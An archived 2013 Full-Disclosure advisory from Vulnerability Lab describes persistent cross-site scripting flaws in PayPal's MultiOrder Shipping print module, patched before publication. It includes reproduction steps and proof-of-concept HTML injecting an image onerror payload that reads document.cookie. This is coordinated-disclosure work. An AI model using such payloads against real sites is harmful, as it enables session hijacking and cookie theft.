lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Tue, 15 Oct 2013 15:14:19 +0200
From: Vulnerability Lab <research@...nerability-lab.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Paypal Inc Bug Bounty #105 MOS - Multiple
 Persistent Print Layout Vulnerabilities

Document Title:
===============
Paypal Inc Bug Bounty #105 MOS - Multiple Persistent Print Layout Vulnerabilities


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1039

PayPal Security UID: xE1128lV


Release Date:
=============
2013-10-15


Vulnerability Laboratory ID (VL-ID):
====================================
1039


Common Vulnerability Scoring System:
====================================
5.1


Product & Service Introduction:
===============================
PayPal is a global e-commerce business allowing payments and money transfers to be made through the Internet. Online money 
transfers serve as electronic alternatives to paying with traditional paper methods, such as checks and money orders. Originally, 
a PayPal account could be funded with an electronic debit from a bank account or by a credit card at the payer s choice. But some 
time in 2010 or early 2011, PayPal began to require a verified bank account after the account holder exceeded a predetermined 
spending limit. After that point, PayPal will attempt to take funds for a purchase from funding sources according to a specified 
funding hierarchy. If you set one of the funding sources as Primary, it will default to that, within that level of the hierarchy 
(for example, if your credit card ending in 4567 is set as the Primary over 1234, it will still attempt to pay money out of your 
PayPal balance, before it attempts to charge your credit card). The funding hierarchy is a balance in the PayPal account; a 
PayPal credit account, PayPal Extras, PayPal SmartConnect, PayPal Extras Master Card or Bill Me Later (if selected as primary 
funding source) (It can bypass the Balance); a verified bank account; other funding sources, such as non-PayPal credit cards.
The recipient of a PayPal transfer can either request a check from PayPal, establish their own PayPal deposit account or request 
a transfer to their bank account.

PayPal is an acquirer, performing payment processing for online vendors, auction sites, and other commercial users, for which it 
charges a fee. It may also charge a fee for receiving money, proportional to the amount received. The fees depend on the currency 
used, the payment option used, the country of the sender, the country of the recipient, the amount sent and the recipient s account 
type. In addition, eBay purchases made by credit card through PayPal may incur extra fees if the buyer and seller use different currencies.

On October 3, 2002, PayPal became a wholly owned subsidiary of eBay. Its corporate headquarters are in San Jose, California, United 
States at eBay s North First Street satellite office campus. The company also has significant operations in Omaha, Nebraska, Scottsdale, 
Arizona, and Austin, Texas, in the United States, Chennai, Dublin, Kleinmachnow (near Berlin) and Tel Aviv. As of July 2007, across 
Europe, PayPal also operates as a Luxembourg-based bank.

On March 17, 2010, PayPal entered into an agreement with China UnionPay (CUP), China s bankcard association, to allow Chinese consumers 
to use PayPal to shop online.PayPal is planning to expand its workforce in Asia to 2,000 by the end of the year 2010.
Between December 4ñ9, 2010, PayPal services were attacked in a series of denial-of-service attacks organized by Anonymous in retaliation 
for PayPal s decision to freeze the account of WikiLeaks citing terms of use violations over the publication of leaked US diplomatic cables.

(Copy of the Homepage: www.paypal.com) [http://en.wikipedia.org/wiki/PayPal]


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a persistent web vulnerability in the official PayPal Inc (Core & API) Shipping Application.


Vulnerability Disclosure Timeline:
==================================
2013-08-03:	Researcher Notification & Coordination (Benjamin Kunz Mejri)
2013-08-04:	Vendor Notification (PayPal Site Security Team - Bug Bounty Program)
2013-08-08:	Vendor Response/Feedback (PayPal Site Security Team - Bug Bounty Program)
2013-09-26:	Vendor Fix/Patch (PayPal Site Developer Team - PayPal Inc)
2013-10-15:	Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
PayPal Inc
Product: Shipping & MOS Application - API 2013 Q2


Exploitation Technique:
=======================
Remote


Severity Level:
===============
High


Technical Details & Description:
================================
Multiple persistent input validation web vulnerabilities are detected in the official PayPal Inc (Core & API) Shipping Web Application.
The vulnerability allows remote attacker to inject own malicious script codes to the application-side with persistent attack vector. 

The vulnerability is located in the Print Packing Slips and Print Selected module when processing to request via POST method 
manipulated itemno, orderno, order or description parameters. The remote attacker can inject the malicious payload (script code) 
as profile shipping pickup values or item details. The effect of the inject will only be visible in the print of the application 
and executes from the bottom of the generated print results list.

Exploitation of the persistent web vulnerability requires a low privilege web application user account and low user interaction. 
Successful exploitation of the vulnerability results in session hijacking, persistent phishing, persistent external redirects, 
persistent load of malicous script codes or persistent web module context manipulation.


Vulnerable Service(s):
				[+] Paypal Inc - PayPal MultiOrder Shipping Application (Core & API) 

Vulnerable Module(s):
				[+] Print Packing Slips
				[+] Print Selected Context

Vulnerable Parameter(s):
				[+] itemno
				[+] orderno
				[+] description

Affected Module(s):
				[+] Print Listing - All or Selected
				[+] Print Bottom Listing (Separat)


Proof of Concept (PoC):
=======================
The persistent input validation web vulnerabilities can be exploited by remote attackers without privilege application user account 
and with low user interaction. For demonstration or reproduce ...

Manual steps to reproduce the remote vulnerability ...

1. Register a US Paypal account and activate the shipping tools module
2. Open it up and inject as order number, item number and description your own script code as payload
3. Open the Print Packing Slips or Print Selected module to list the already injected payload
4. A new seperate window openes on print selected values of the shipping request
5. The injected payload will be executed in the bottom of the print listing
6. Successful reproduced!


PoC: PACKING SLIP - Print All

<tr><td width="1*"><img src="PayPal%20MultiOrder%20Shipping%20-%20Print%20Packing%20Slips%20-poc_files/honey8.htm" border="0"></td><td 

valign="bottom">"/><br>"/>a%20/>"><img src="PayPal%20MultiOrder%20Shipping%20-%20Print%20Packing%20Slips%20-poc_files/t.htm" 
onerror="prompt(document.cookie)">  a%20/>"><h1>alsfkjlan</h1><br>a%20/>"><h1>alsfkjlan</h1><br>Galveston"/>, TX 77550</td>
<td class="packskip" align="right" valign="bottom">PACKING SLIP</td></tr>
...    ...
<tr><td width="1*"><img src="PayPal%20MultiOrder%20Shipping%20-%20Print%20Packing%20Slips555555_files/honey8.htm" border="0"></td><td 

valign="bottom">"/><br>"/>a%20/>"><img src="PayPal%20MultiOrder%20Shipping%20-%20Print%20Packing%20Slips555555_files/t.htm" 
onerror="prompt(document.cookie)">  a%20/>"><h1>alsfkjlan</h1><br>a%20/>"><h1>alsfkjlan</h1><br>Galveston"/>, TX 77550</td>
<td class="packskip" align="right" valign="bottom">PACKING SLIP</td></tr>
...    ...
<tr><td width="1*">&#8203;&#8203;&#8203;&#8203;&#8203;<img src="http://vulnerability-lab.com/honey8.html" border="0"></td><td valign="bottom">"/><br>"/>a%20/>">
<img src="t.png" onerror="prompt(document.cookie)">  a%20/>"><h1>alsfkjlan</h1>&#8203;&#8203;&#8203;&#8203;&#8203;<br>a%20/>"><h1>alsfkjlan</h1><br>Galveston"
/>, TX 77550</td><td class="packskip" align="right" valign="bottom">PACKING SLIP</td></tr>



PoC: PACKING SLIP - Print Selected

<tr><td width="1*"><img src="PayPal%20MultiOrder%20Shipping%20-%20Print%20Packing%20Slips555555_files/honey8.htm" border="0"></td>
<td valign="bottom"></td><td class="packskip" align="right" valign="bottom">PACKING SLIP</td></tr>


Solution - Fix & Patch:
=======================
The vulnerability can be patched by a restriction of the vulnerable description, itemno, oder, orderno parameters input. 
The input needs to be secure encoded and parsed by a separate filter mechanism.
At the end parse and encode the print output listing in the documents of the print selected and print packing slips module.


Security Risk:
==============
The security risk of the persistent input validation web vulnerability is estimated as medium(+)|(-)high.


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@...lution-sec.com)


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       - www.evolution-sec.com
Contact:    admin@...nerability-lab.com 	- research@...nerability-lab.com 	       - admin@...lution-sec.com
Section:    www.vulnerability-lab.com/dev 	- forum.vulnerability-db.com 		       - magazine.vulnerability-db.com
Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       - youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and 
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), 
modify, use or edit our material contact (admin@...nerability-lab.com or research@...nerability-lab.com) to get a permission.

				Copyright © 2013 | Vulnerability Laboratory [Evolution Security]



-- 
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@...nerability-lab.com


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists